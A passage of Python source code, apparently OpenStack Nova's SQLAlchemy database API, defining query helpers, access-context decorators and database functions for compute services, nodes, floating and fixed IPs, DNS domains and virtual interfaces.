_SHADOW_TABLE_PREFIX = 'shadow_'
_DEFAULT_QUOTA_NAME = 'default'
PER_PROJECT_QUOTAS = ['fixed_ips', 'floating_ips', 'networks']
def get_backend():
"""The backend is this module itself."""
return sys.modules[__name__]
def require_admin_context(f):
"""Decorator to require admin request context.
The first argument to the wrapped function must be the context.
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
nova.context.require_admin_context(args[0])
return f(*args, **kwargs)
return wrapper
def require_context(f):
"""Decorator to require *any* user or admin context.
This does no authorization for user or project access matching, see
:py:func:`nova.context.authorize_project_context` and
:py:func:`nova.context.authorize_user_context`.
The first argument to the wrapped function must be the context.
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
nova.context.require_context(args[0])
return f(*args, **kwargs)
return wrapper
def require_instance_exists_using_uuid(f):
"""Decorator to require the specified instance to exist.
Requires the wrapped function to use context and instance_uuid as
their first two arguments.
"""
@functools.wraps(f)
def wrapper(context, instance_uuid, *args, **kwargs):
instance_get_by_uuid(context, instance_uuid)
return f(context, instance_uuid, *args, **kwargs)
return wrapper
def require_aggregate_exists(f):
"""Decorator to require the specified aggregate to exist.
Requires the wrapped function to use context and aggregate_id as
their first two arguments.
"""
@functools.wraps(f)
def wrapper(context, aggregate_id, *args, **kwargs):
aggregate_get(context, aggregate_id)
return f(context, aggregate_id, *args, **kwargs)
return wrapper
def _retry_on_deadlock(f):
"""Decorator to retry a DB API call if Deadlock was received."""
@functools.wraps(f)
def wrapped(*args, **kwargs):
while True:
try:
return f(*args, **kwargs)
except db_exc.DBDeadlock:
LOG.warn(_("Deadlock detected when running "
"'%(func_name)s': Retrying..."),
dict(func_name=f.__name__))
# Retry!
time.sleep(0.5)
continue
functools.update_wrapper(wrapped, f)
return wrapped
def model_query(context, model, *args, **kwargs):
"""Query helper that accounts for context's `read_deleted` field.
:param context: context to query under
:param use_slave: If true, use slave_connection
:param session: if present, the session to use
:param read_deleted: if present, overrides context's read_deleted field.
:param project_only: if present and context is user-type, then restrict
query to match the context's project_id. If set to 'allow_none',
restriction includes project_id = None.
:param base_model: Where model_query is passed a "model" parameter which is
not a subclass of NovaBase, we should pass an extra base_model
parameter that is a subclass of NovaBase and corresponds to the
model parameter.
"""
use_slave = kwargs.get('use_slave') or False
if CONF.database.slave_connection == '':
use_slave = False
session = kwargs.get('session') or get_session(use_slave=use_slave)
read_deleted = kwargs.get('read_deleted') or context.read_deleted
project_only = kwargs.get('project_only', False)
def issubclassof_nova_base(obj):
return isinstance(obj, type) and issubclass(obj, models.NovaBase)
base_model = model
if not issubclassof_nova_base(base_model):
base_model = kwargs.get('base_model', None)
if not issubclassof_nova_base(base_model):
raise Exception(_("model or base_model parameter should be "
"subclass of NovaBase"))
query = session.query(model, *args)
default_deleted_value = base_model.__mapper__.c.deleted.default.arg
if read_deleted == 'no':
query = query.filter(base_model.deleted == default_deleted_value)
elif read_deleted == 'yes':
pass # omit the filter to include deleted and active
elif read_deleted == 'only':
query = query.filter(base_model.deleted != default_deleted_value)
else:
raise Exception(_("Unrecognized read_deleted value '%s'")
% read_deleted)
if nova.context.is_user_context(context) and project_only:
if project_only == 'allow_none':
query = query.\
filter(or_(base_model.project_id == context.project_id,
base_model.project_id == None))
else:
query = query.filter_by(project_id=context.project_id)
return query
def exact_filter(query, model, filters, legal_keys):
"""Applies exact match filtering to a query.
Returns the updated query. Modifies filters argument to remove
filters consumed.
:param query: query to apply filters to
:param model: model object the query applies to, for IN-style
filtering
:param filters: dictionary of filters; values that are lists,
tuples, sets, or frozensets cause an 'IN' test to
be performed, while exact matching ('==' operator)
is used for other values
:param legal_keys: list of keys to apply exact filtering to
"""
filter_dict = {}
# Walk through all the keys
for key in legal_keys:
# Skip ones we're not filtering on
if key not in filters:
continue
# OK, filtering on this key; what value do we search for?
value = filters.pop(key)
if key in ('metadata', 'system_metadata'):
column_attr = getattr(model, key)
if isinstance(value, list):
for item in value:
for k, v in item.iteritems():
query = query.filter(column_attr.any(key=k))
query = query.filter(column_attr.any(value=v))
else:
for k, v in value.iteritems():
query = query.filter(column_attr.any(key=k))
query = query.filter(column_attr.any(value=v))
elif isinstance(value, (list, tuple, set, frozenset)):
# Looking for values in a list; apply to query directly
column_attr = getattr(model, key)
query = query.filter(column_attr.in_(value))
else:
# OK, simple exact match; save for later
filter_dict[key] = value
# Apply simple exact matches
if filter_dict:
query = query.filter_by(**filter_dict)
return query
def convert_objects_related_datetimes(values, *datetime_keys):
for key in datetime_keys:
if key in values and values[key]:
if isinstance(values[key], six.string_types):
values[key] = timeutils.parse_strtime(values[key])
# NOTE(danms): Strip UTC timezones from datetimes, since they're
# stored that way in the database
values[key] = values[key].replace(tzinfo=None)
return values
def _sync_instances(context, project_id, user_id, session):
return dict(zip(('instances', 'cores', 'ram'),
_instance_data_get_for_user(
context, project_id, user_id, session)))
def _sync_floating_ips(context, project_id, user_id, session):
return dict(floating_ips=_floating_ip_count_by_project(
context, project_id, session))
def _sync_fixed_ips(context, project_id, user_id, session):
return dict(fixed_ips=_fixed_ip_count_by_project(
context, project_id, session))
def _sync_security_groups(context, project_id, user_id, session):
return dict(security_groups=_security_group_count_by_project_and_user(
context, project_id, user_id, session))
QUOTA_SYNC_FUNCTIONS = {
'_sync_instances': _sync_instances,
'_sync_floating_ips': _sync_floating_ips,
'_sync_fixed_ips': _sync_fixed_ips,
'_sync_security_groups': _sync_security_groups,
}
###################
def constraint(**conditions):
return Constraint(conditions)
def equal_any(*values):
return EqualityCondition(values)
def not_equal(*values):
return InequalityCondition(values)
class Constraint(object):
def __init__(self, conditions):
self.conditions = conditions
def apply(self, model, query):
for key, condition in self.conditions.iteritems():
for clause in condition.clauses(getattr(model, key)):
query = query.filter(clause)
return query
class EqualityCondition(object):
def __init__(self, values):
self.values = values
def clauses(self, field):
# method signature requires us to return an iterable even if for OR
# operator this will actually be a single clause
return [or_(*[field == value for value in self.values])]
class InequalityCondition(object):
def __init__(self, values):
self.values = values
def clauses(self, field):
return [field != value for value in self.values]
###################
@require_admin_context
def service_destroy(context, service_id):
session = get_session()
with session.begin():
count = model_query(context, models.Service, session=session).\
filter_by(id=service_id).\
soft_delete(synchronize_session=False)
if count == 0:
raise exception.ServiceNotFound(service_id=service_id)
model_query(context, models.ComputeNode, session=session).\
filter_by(service_id=service_id).\
soft_delete(synchronize_session=False)
def _service_get(context, service_id, with_compute_node=True, session=None):
query = model_query(context, models.Service, session=session).\
filter_by(id=service_id)
if with_compute_node:
query = query.options(joinedload('compute_node'))
result = query.first()
if not result:
raise exception.ServiceNotFound(service_id=service_id)
return result
@require_admin_context
def service_get(context, service_id):
return _service_get(context, service_id)
@require_admin_context
def service_get_all(context, disabled=None):
query = model_query(context, models.Service)
if disabled is not None:
query = query.filter_by(disabled=disabled)
return query.all()
@require_admin_context
def service_get_all_by_topic(context, topic):
return model_query(context, models.Service, read_deleted="no").\
filter_by(disabled=False).\
filter_by(topic=topic).\
all()
@require_admin_context
def service_get_by_host_and_topic(context, host, topic):
return model_query(context, models.Service, read_deleted="no").\
filter_by(disabled=False).\
filter_by(host=host).\
filter_by(topic=topic).\
first()
@require_admin_context
def service_get_all_by_host(context, host):
return model_query(context, models.Service, read_deleted="no").\
filter_by(host=host).\
all()
@require_admin_context
def service_get_by_compute_host(context, host):
result = model_query(context, models.Service, read_deleted="no").\
options(joinedload('compute_node')).\
filter_by(host=host).\
filter_by(topic=CONF.compute_topic).\
first()
if not result:
raise exception.ComputeHostNotFound(host=host)
return result
@require_admin_context
def service_get_by_args(context, host, binary):
result = model_query(context, models.Service).\
filter_by(host=host).\
filter_by(binary=binary).\
first()
if not result:
raise exception.HostBinaryNotFound(host=host, binary=binary)
return result
@require_admin_context
def service_create(context, values):
service_ref = models.Service()
service_ref.update(values)
if not CONF.enable_new_services:
service_ref.disabled = True
try:
service_ref.save()
except db_exc.DBDuplicateEntry as e:
if 'binary' in e.columns:
raise exception.ServiceBinaryExists(host=values.get('host'),
binary=values.get('binary'))
raise exception.ServiceTopicExists(host=values.get('host'),
topic=values.get('topic'))
return service_ref
@require_admin_context
def service_update(context, service_id, values):
session = get_session()
with session.begin():
service_ref = _service_get(context, service_id,
with_compute_node=False, session=session)
service_ref.update(values)
return service_ref
###################
def compute_node_get(context, compute_id):
return _compute_node_get(context, compute_id)
def _compute_node_get(context, compute_id, session=None):
result = model_query(context, models.ComputeNode, session=session).\
filter_by(id=compute_id).\
options(joinedload('service')).\
first()
if not result:
raise exception.ComputeHostNotFound(host=compute_id)
return result
@require_admin_context
def compute_node_get_by_service_id(context, service_id):
result = model_query(context, models.ComputeNode, read_deleted='no').\
filter_by(service_id=service_id).\
first()
if not result:
raise exception.ServiceNotFound(service_id=service_id)
return result
@require_admin_context
def compute_node_get_all(context, no_date_fields):
# NOTE(msdubov): Using lower-level 'select' queries and joining the tables
# manually here allows to gain 3x speed-up and to have 5x
# less network load / memory usage compared to the sqla ORM.
engine = get_engine()
# Retrieve ComputeNode, Service
compute_node = models.ComputeNode.__table__
service = models.Service.__table__
with engine.begin() as conn:
redundant_columns = set(['deleted_at', 'created_at', 'updated_at',
'deleted']) if no_date_fields else set([])
def filter_columns(table):
return [c for c in table.c if c.name not in redundant_columns]
compute_node_query = select(filter_columns(compute_node)).\
where(compute_node.c.deleted == 0).\
order_by(compute_node.c.service_id)
compute_node_rows = conn.execute(compute_node_query).fetchall()
service_query = select(filter_columns(service)).\
where((service.c.deleted == 0) &
(service.c.binary == 'nova-compute')).\
order_by(service.c.id)
service_rows = conn.execute(service_query).fetchall()
# Join ComputeNode & Service manually.
services = {}
for proxy in service_rows:
services[proxy['id']] = dict(proxy.items())
compute_nodes = []
for proxy in compute_node_rows:
node = dict(proxy.items())
node['service'] = services.get(proxy['service_id'])
compute_nodes.append(node)
return compute_nodes
@require_admin_context
def compute_node_search_by_hypervisor(context, hypervisor_match):
field = models.ComputeNode.hypervisor_hostname
return model_query(context, models.ComputeNode).\
options(joinedload('service')).\
filter(field.like('%%%s%%' % hypervisor_match)).\
all()
@require_admin_context
def compute_node_create(context, values):
"""Creates a new ComputeNode and populates the capacity fields
with the most recent data.
"""
datetime_keys = ('created_at', 'deleted_at', 'updated_at')
convert_objects_related_datetimes(values, *datetime_keys)
compute_node_ref = models.ComputeNode()
compute_node_ref.update(values)
compute_node_ref.save()
return compute_node_ref
@require_admin_context
@_retry_on_deadlock
def compute_node_update(context, compute_id, values):
"""Updates the ComputeNode record with the most recent data."""
session = get_session()
with session.begin():
compute_ref = _compute_node_get(context, compute_id, session=session)
# Always update this, even if there's going to be no other
# changes in data. This ensures that we invalidate the
# scheduler cache of compute node data in case of races.
values['updated_at'] = timeutils.utcnow()
datetime_keys = ('created_at', 'deleted_at', 'updated_at')
convert_objects_related_datetimes(values, *datetime_keys)
compute_ref.update(values)
return compute_ref
@require_admin_context
def compute_node_delete(context, compute_id):
"""Delete a ComputeNode record."""
session = get_session()
with session.begin():
result = model_query(context, models.ComputeNode, session=session).\
filter_by(id=compute_id).\
soft_delete(synchronize_session=False)
if not result:
raise exception.ComputeHostNotFound(host=compute_id)
def compute_node_statistics(context):
"""Compute statistics over all compute nodes."""
result = model_query(context,
func.count(models.ComputeNode.id),
func.sum(models.ComputeNode.vcpus),
func.sum(models.ComputeNode.memory_mb),
func.sum(models.ComputeNode.local_gb),
func.sum(models.ComputeNode.vcpus_used),
func.sum(models.ComputeNode.memory_mb_used),
func.sum(models.ComputeNode.local_gb_used),
func.sum(models.ComputeNode.free_ram_mb),
func.sum(models.ComputeNode.free_disk_gb),
func.sum(models.ComputeNode.current_workload),
func.sum(models.ComputeNode.running_vms),
func.sum(models.ComputeNode.disk_available_least),
base_model=models.ComputeNode,
read_deleted="no").first()
# Build a dict of the info--making no assumptions about result
fields = ('count', 'vcpus', 'memory_mb', 'local_gb', 'vcpus_used',
'memory_mb_used', 'local_gb_used', 'free_ram_mb', 'free_disk_gb',
'current_workload', 'running_vms', 'disk_available_least')
return dict((field, int(result[idx] or 0))
for idx, field in enumerate(fields))
###################
@require_admin_context
def certificate_create(context, values):
certificate_ref = models.Certificate()
for (key, value) in values.iteritems():
certificate_ref[key] = value
certificate_ref.save()
return certificate_ref
@require_admin_context
def certificate_get_all_by_project(context, project_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(project_id=project_id).\
all()
@require_admin_context
def certificate_get_all_by_user(context, user_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(user_id=user_id).\
all()
@require_admin_context
def certificate_get_all_by_user_and_project(context, user_id, project_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(user_id=user_id).\
filter_by(project_id=project_id).\
all()
###################
@require_context
def floating_ip_get(context, id):
try:
result = model_query(context, models.FloatingIp, project_only=True).\
filter_by(id=id).\
options(joinedload_all('fixed_ip.instance')).\
first()
if not result:
raise exception.FloatingIpNotFound(id=id)
except DataError:
msg = _("Invalid floating ip id %s in request") % id
LOG.warn(msg)
raise exception.InvalidID(id=id)
return result
@require_context
def floating_ip_get_pools(context):
pools = []
for result in model_query(context, models.FloatingIp.pool,
base_model=models.FloatingIp).distinct():
pools.append({'name': result[0]})
return pools
@require_context
def floating_ip_allocate_address(context, project_id, pool,
auto_assigned=False):
nova.context.authorize_project_context(context, project_id)
session = get_session()
with session.begin():
floating_ip_ref = model_query(context, models.FloatingIp,
session=session, read_deleted="no").\
filter_by(fixed_ip_id=None).\
filter_by(project_id=None).\
filter_by(pool=pool).\
with_lockmode('update').\
first()
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
if not floating_ip_ref:
raise exception.NoMoreFloatingIps()
floating_ip_ref['project_id'] = project_id
floating_ip_ref['auto_assigned'] = auto_assigned
session.add(floating_ip_ref)
return floating_ip_ref['address']
@require_context
def floating_ip_bulk_create(context, ips):
session = get_session()
with session.begin():
for ip in ips:
model = models.FloatingIp()
model.update(ip)
try:
# NOTE(boris-42): To get existing address we have to do each
# time session.flush()..
session.add(model)
session.flush()
except db_exc.DBDuplicateEntry:
raise exception.FloatingIpExists(address=ip['address'])
def _ip_range_splitter(ips, block_size=256):
"""Yields blocks of IPs no more than block_size elements long."""
out = []
count = 0
for ip in ips:
out.append(ip['address'])
count += 1
if count > block_size - 1:
yield out
out = []
count = 0
if out:
yield out
@require_context
def floating_ip_bulk_destroy(context, ips):
session = get_session()
with session.begin():
project_id_to_quota_count = collections.defaultdict(int)
for ip_block in _ip_range_splitter(ips):
# Find any floating IPs that were not auto_assigned and
# thus need quota released.
query = model_query(context, models.FloatingIp).\
filter(models.FloatingIp.address.in_(ip_block)).\
filter_by(auto_assigned=False)
rows = query.all()
for row in rows:
# The count is negative since we release quota by
# reserving negative quota.
project_id_to_quota_count[row['project_id']] -= 1
# Delete the floating IPs.
model_query(context, models.FloatingIp).\
filter(models.FloatingIp.address.in_(ip_block)).\
soft_delete(synchronize_session='fetch')
# Delete the quotas, if needed.
for project_id, count in project_id_to_quota_count.iteritems():
try:
reservations = quota.QUOTAS.reserve(context,
project_id=project_id,
floating_ips=count)
quota.QUOTAS.commit(context,
reservations,
project_id=project_id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update usages bulk "
"deallocating floating IP"))
@require_context
def floating_ip_create(context, values):
floating_ip_ref = models.FloatingIp()
floating_ip_ref.update(values)
try:
floating_ip_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.FloatingIpExists(address=values['address'])
return floating_ip_ref
def _floating_ip_count_by_project(context, project_id, session=None):
nova.context.authorize_project_context(context, project_id)
# TODO(tr3buchet): why leave auto_assigned floating IPs out?
return model_query(context, models.FloatingIp, read_deleted="no",
session=session).\
filter_by(project_id=project_id).\
filter_by(auto_assigned=False).\
count()
@require_context
@_retry_on_deadlock
def floating_ip_fixed_ip_associate(context, floating_address,
fixed_address, host):
session = get_session()
with session.begin():
floating_ip_ref = _floating_ip_get_by_address(context,
floating_address,
session=session)
fixed_ip_ref = model_query(context, models.FixedIp, session=session).\
filter_by(address=fixed_address).\
options(joinedload('network')).\
first()
if floating_ip_ref.fixed_ip_id == fixed_ip_ref["id"]:
return None
floating_ip_ref.fixed_ip_id = fixed_ip_ref["id"]
floating_ip_ref.host = host
return fixed_ip_ref
@require_context
def floating_ip_deallocate(context, address):
model_query(context, models.FloatingIp).\
filter_by(address=address).\
update({'project_id': None,
'host': None,
'auto_assigned': False})
@require_context
def floating_ip_destroy(context, address):
model_query(context, models.FloatingIp).\
filter_by(address=address).\
delete()
@require_context
def floating_ip_disassociate(context, address):
session = get_session()
with session.begin():
floating_ip_ref = model_query(context,
models.FloatingIp,
session=session).\
filter_by(address=address).\
first()
if not floating_ip_ref:
raise exception.FloatingIpNotFoundForAddress(address=address)
fixed_ip_ref = model_query(context, models.FixedIp, session=session).\
filter_by(id=floating_ip_ref['fixed_ip_id']).\
options(joinedload('network')).\
first()
floating_ip_ref.fixed_ip_id = None
floating_ip_ref.host = None
return fixed_ip_ref
@require_context
def floating_ip_set_auto_assigned(context, address):
model_query(context, models.FloatingIp).\
filter_by(address=address).\
update({'auto_assigned': True})
def _floating_ip_get_all(context, session=None):
return model_query(context, models.FloatingIp, read_deleted="no",
session=session)
@require_admin_context
def floating_ip_get_all(context):
floating_ip_refs = _floating_ip_get_all(context).all()
if not floating_ip_refs:
raise exception.NoFloatingIpsDefined()
return floating_ip_refs
@require_admin_context
def floating_ip_get_all_by_host(context, host):
floating_ip_refs = _floating_ip_get_all(context).\
filter_by(host=host).\
all()
if not floating_ip_refs:
raise exception.FloatingIpNotFoundForHost(host=host)
return floating_ip_refs
@require_context
def floating_ip_get_all_by_project(context, project_id):
nova.context.authorize_project_context(context, project_id)
# TODO(tr3buchet): why do we not want auto_assigned floating IPs here?
return _floating_ip_get_all(context).\
filter_by(project_id=project_id).\
filter_by(auto_assigned=False).\
options(joinedload_all('fixed_ip.instance')).\
all()
@require_context
def floating_ip_get_by_address(context, address):
return _floating_ip_get_by_address(context, address)
def _floating_ip_get_by_address(context, address, session=None):
# if address string is empty explicitly set it to None
if not address:
address = None
try:
result = model_query(context, models.FloatingIp, session=session).\
filter_by(address=address).\
options(joinedload_all('fixed_ip.instance')).\
first()
if not result:
raise exception.FloatingIpNotFoundForAddress(address=address)
except DataError:
msg = _("Invalid floating IP %s in request") % address
LOG.warn(msg)
raise exception.InvalidIpAddressError(msg)
# If the floating IP has a project ID set, check to make sure
# the non-admin user has access.
if result.project_id and nova.context.is_user_context(context):
nova.context.authorize_project_context(context, result.project_id)
return result
@require_context
def floating_ip_get_by_fixed_address(context, fixed_address):
return model_query(context, models.FloatingIp).\
outerjoin(models.FixedIp,
models.FixedIp.id ==
models.FloatingIp.fixed_ip_id).\
filter(models.FixedIp.address == fixed_address).\
all()
@require_context
def floating_ip_get_by_fixed_ip_id(context, fixed_ip_id):
return model_query(context, models.FloatingIp).\
filter_by(fixed_ip_id=fixed_ip_id).\
all()
@require_context
def floating_ip_update(context, address, values):
session = get_session()
with session.begin():
float_ip_ref = _floating_ip_get_by_address(context, address, session)
float_ip_ref.update(values)
try:
float_ip_ref.save(session=session)
except db_exc.DBDuplicateEntry:
raise exception.FloatingIpExists(address=values['address'])
def _dnsdomain_get(context, session, fqdomain):
return model_query(context, models.DNSDomain,
session=session, read_deleted="no").\
filter_by(domain=fqdomain).\
with_lockmode('update').\
first()
@require_context
def dnsdomain_get(context, fqdomain):
session = get_session()
with session.begin():
return _dnsdomain_get(context, session, fqdomain)
def _dnsdomain_get_or_create(context, session, fqdomain):
domain_ref = _dnsdomain_get(context, session, fqdomain)
if not domain_ref:
dns_ref = models.DNSDomain()
dns_ref.update({'domain': fqdomain,
'availability_zone': None,
'project_id': None})
return dns_ref
return domain_ref
@require_admin_context
def dnsdomain_register_for_zone(context, fqdomain, zone):
session = get_session()
with session.begin():
domain_ref = _dnsdomain_get_or_create(context, session, fqdomain)
domain_ref.scope = 'private'
domain_ref.availability_zone = zone
session.add(domain_ref)
@require_admin_context
def dnsdomain_register_for_project(context, fqdomain, project):
session = get_session()
with session.begin():
domain_ref = _dnsdomain_get_or_create(context, session, fqdomain)
domain_ref.scope = 'public'
domain_ref.project_id = project
session.add(domain_ref)
@require_admin_context
def dnsdomain_unregister(context, fqdomain):
model_query(context, models.DNSDomain).\
filter_by(domain=fqdomain).\
delete()
@require_context
def dnsdomain_list(context):
query = model_query(context, models.DNSDomain, read_deleted="no")
return [row.domain for row in query.all()]
def dnsdomain_get_all(context):
return model_query(context, models.DNSDomain, read_deleted="no").all()
###################
@require_admin_context
def fixed_ip_associate(context, address, instance_uuid, network_id=None,
reserved=False):
"""Keyword arguments:
reserved -- should be a boolean value(True or False), exact value will be
used to filter on the fixed ip address
"""
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
session = get_session()
with session.begin():
network_or_none = or_(models.FixedIp.network_id == network_id,
models.FixedIp.network_id == None)
fixed_ip_ref = model_query(context, models.FixedIp, session=session,
read_deleted="no").\
filter(network_or_none).\
filter_by(reserved=reserved).\
filter_by(address=address).\
with_lockmode('update').\
first()
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
if fixed_ip_ref is None:
raise exception.FixedIpNotFoundForNetwork(address=address,
network_uuid=network_id)
if fixed_ip_ref.instance_uuid:
raise exception.FixedIpAlreadyInUse(address=address,
instance_uuid=instance_uuid)
if not fixed_ip_ref.network_id:
fixed_ip_ref.network_id = network_id
fixed_ip_ref.instance_uuid = instance_uuid
session.add(fixed_ip_ref)
return fixed_ip_ref
@require_admin_context
def fixed_ip_associate_pool(context, network_id, instance_uuid=None,
host=None):
if instance_uuid and not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
session = get_session()
with session.begin():
network_or_none = or_(models.FixedIp.network_id == network_id,
models.FixedIp.network_id == None)
fixed_ip_ref = model_query(context, models.FixedIp, session=session,
read_deleted="no").\
filter(network_or_none).\
filter_by(reserved=False).\
filter_by(instance_uuid=None).\
filter_by(host=None).\
with_lockmode('update').\
first()
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
if not fixed_ip_ref:
raise exception.NoMoreFixedIps()
if fixed_ip_ref['network_id'] is None:
fixed_ip_ref['network'] = network_id
if instance_uuid:
fixed_ip_ref['instance_uuid'] = instance_uuid
if host:
fixed_ip_ref['host'] = host
session.add(fixed_ip_ref)
return fixed_ip_ref
@require_context
def fixed_ip_create(context, values):
fixed_ip_ref = models.FixedIp()
fixed_ip_ref.update(values)
try:
fixed_ip_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.FixedIpExists(address=values['address'])
return fixed_ip_ref
@require_context
def fixed_ip_bulk_create(context, ips):
session = get_session()
with session.begin():
for ip in ips:
model = models.FixedIp()
model.update(ip)
try:
# NOTE (vsergeyev): To get existing address we have to do each
# time session.flush().
# See related note at line 697.
session.add(model)
session.flush()
except db_exc.DBDuplicateEntry:
raise exception.FixedIpExists(address=ip['address'])
@require_context
def fixed_ip_disassociate(context, address):
session = get_session()
with session.begin():
_fixed_ip_get_by_address(context, address, session=session).\
update({'instance_uuid': None})
@require_admin_context
def fixed_ip_disassociate_all_by_timeout(context, host, time):
session = get_session()
# NOTE(vish): only update fixed ips that "belong" to this
# host; i.e. the network host or the instance
# host matches. Two queries necessary because
# join with update doesn't work.
with session.begin():
host_filter = or_(and_(models.Instance.host == host,
models.Network.multi_host == True),
models.Network.host == host)
result = model_query(context, models.FixedIp.id,
base_model=models.FixedIp, read_deleted="no",
session=session).\
filter(models.FixedIp.allocated == False).\
filter(models.FixedIp.updated_at < time).\
join((models.Network,
models.Network.id == models.FixedIp.network_id)).\
join((models.Instance,
models.Instance.uuid == models.FixedIp.instance_uuid)).\
filter(host_filter).\
all()
fixed_ip_ids = [fip[0] for fip in result]
if not fixed_ip_ids:
return 0
result = model_query(context, models.FixedIp, session=session).\
filter(models.FixedIp.id.in_(fixed_ip_ids)).\
update({'instance_uuid': None,
'leased': False,
'updated_at': timeutils.utcnow()},
synchronize_session='fetch')
return result
@require_context
def fixed_ip_get(context, id, get_network=False):
query = model_query(context, models.FixedIp).filter_by(id=id)
if get_network:
query = query.options(joinedload('network'))
result = query.first()
if not result:
raise exception.FixedIpNotFound(id=id)
# FIXME(sirp): shouldn't we just use project_only here to restrict the
# results?
if (nova.context.is_user_context(context) and
result['instance_uuid'] is not None):
instance = instance_get_by_uuid(context.elevated(read_deleted='yes'),
result['instance_uuid'])
nova.context.authorize_project_context(context, instance.project_id)
return result
@require_admin_context
def fixed_ip_get_all(context):
result = model_query(context, models.FixedIp, read_deleted="yes").all()
if not result:
raise exception.NoFixedIpsDefined()
return result
@require_context
def fixed_ip_get_by_address(context, address, columns_to_join=None):
return _fixed_ip_get_by_address(context, address,
columns_to_join=columns_to_join)
def _fixed_ip_get_by_address(context, address, session=None,
columns_to_join=None):
if session is None:
session = get_session()
if columns_to_join is None:
columns_to_join = []
with session.begin(subtransactions=True):
try:
result = model_query(context, models.FixedIp, session=session)
for column in columns_to_join:
result = result.options(joinedload_all(column))
result = result.filter_by(address=address).first()
if not result:
raise exception.FixedIpNotFoundForAddress(address=address)
except DataError:
msg = _("Invalid fixed IP Address %s in request") % address
LOG.warn(msg)
raise exception.FixedIpInvalid(msg)
# NOTE(sirp): shouldn't we just use project_only here to restrict the
# results?
if (nova.context.is_user_context(context) and
result['instance_uuid'] is not None):
instance = _instance_get_by_uuid(
context.elevated(read_deleted='yes'),
result['instance_uuid'],
session
)
nova.context.authorize_project_context(context,
instance.project_id)
return result
@require_admin_context
def fixed_ip_get_by_address_detailed(context, address):
""":returns: a tuple of (models.FixedIp, models.Network, models.Instance)
"""
try:
result = model_query(context, models.FixedIp,
models.Network, models.Instance).\
filter_by(address=address).\
outerjoin((models.Network,
models.Network.id ==
models.FixedIp.network_id)).\
outerjoin((models.Instance,
models.Instance.uuid ==
models.FixedIp.instance_uuid)).\
first()
if not result:
raise exception.FixedIpNotFoundForAddress(address=address)
except DataError:
msg = _("Invalid fixed IP Address %s in request") % address
LOG.warn(msg)
raise exception.FixedIpInvalid(msg)
return result
@require_context
def fixed_ip_get_by_floating_address(context, floating_address):
return model_query(context, models.FixedIp).\
outerjoin(models.FloatingIp,
models.FloatingIp.fixed_ip_id ==
models.FixedIp.id).\
filter(models.FloatingIp.address == floating_address).\
first()
# NOTE(tr3buchet) please don't invent an exception here, empty list is fine
@require_context
def fixed_ip_get_by_instance(context, instance_uuid):
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(instance_uuid=instance_uuid).\
all()
if not result:
raise exception.FixedIpNotFoundForInstance(instance_uuid=instance_uuid)
return result
@require_admin_context
def fixed_ip_get_by_host(context, host):
session = get_session()
with session.begin():
instance_uuids = _instance_get_all_uuids_by_host(context, host,
session=session)
if not instance_uuids:
return []
return model_query(context, models.FixedIp, session=session).\
filter(models.FixedIp.instance_uuid.in_(instance_uuids)).\
all()
@require_context
def fixed_ip_get_by_network_host(context, network_id, host):
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id).\
filter_by(host=host).\
first()
if not result:
raise exception.FixedIpNotFoundForNetworkHost(network_id=network_id,
host=host)
return result
@require_context
def fixed_ips_by_virtual_interface(context, vif_id):
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(virtual_interface_id=vif_id).\
all()
return result
@require_context
def fixed_ip_update(context, address, values):
session = get_session()
with session.begin():
_fixed_ip_get_by_address(context, address, session=session).\
update(values)
def _fixed_ip_count_by_project(context, project_id, session=None):
nova.context.authorize_project_context(context, project_id)
return model_query(context, models.FixedIp.id,
base_model=models.FixedIp, read_deleted="no",
session=session).\
join((models.Instance,
models.Instance.uuid == models.FixedIp.instance_uuid)).\
filter(models.Instance.project_id == project_id).\
count()
###################
@require_context
def virtual_interface_create(context, values):
"""Create a new virtual interface record in the database.
:param values: = dict containing column values
"""
try:
vif_ref = models.VirtualInterface()
vif_ref.update(values)
vif_ref.save()
except db_exc.DBError:
raise exception.VirtualInterfaceCreateException()
return vif_ref
def _virtual_interface_query(context, session=None, use_slave=False):
return model_query(context, models.VirtualInterface, session=session,
read_deleted="no", use_slave=use_slave)
@require_context
def virtual_interface_get(context, vif_id):
"""Gets a virtual interface from the table.
:param vif_id: = id of the virtual interface
"""
vif_ref = _virtual_interface_query(context).\
filter_by(id=vif_id).\
first()
return vif_ref
@require_context
def virtual_interface_get_by_address(context, address):
"""Gets a virtual interface from the table.
:param address: = the address of the interface you're looking to get
"""
try:
vif_ref = _virtual_interface_query(context).\
filter_by(address=address).\
first()
except DataError:
msg = _("Invalid virtual interface address %s in request") % address
LOG.warn(msg)
raise exception.InvalidIpAddressError(msg)
return vif_ref
@require_context
def virtual_interface_get_by_uuid(context, vif_uuid):
"""Gets a virtual interface from the table.
:param vif_uuid: the uuid of the interface you're looking to get
"""
vif_ref = _virtual_interface_query(context).\
filter_by(uuid=vif_uuid).\
first()
return vif_ref
@require_context
@require_instance_exists_using_uuid
def virtual_interface_get_by_instance(context, instance_uuid, use_slave=False):
"""Gets all virtual interfaces for instance.
:param instance_uuid: = uuid of the instance to retrieve vifs for
"""
vif_refs = _virtual_interface_query(context, use_slave=use_slave).\
filter_by(instance_uuid=instance_uuid).\
all()
return vif_refs
@require_context
def virtual_interface_get_by_instance_and_network(context, instance_uuid,
network_id):
"""Gets virtual interface for instance that's associated with network."""
vif_ref = _virtual_interface_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(network_id=network_id).\
first()
return vif_ref
@require_context
def virtual_interface_delete_by_instance(context, instance_uuid):
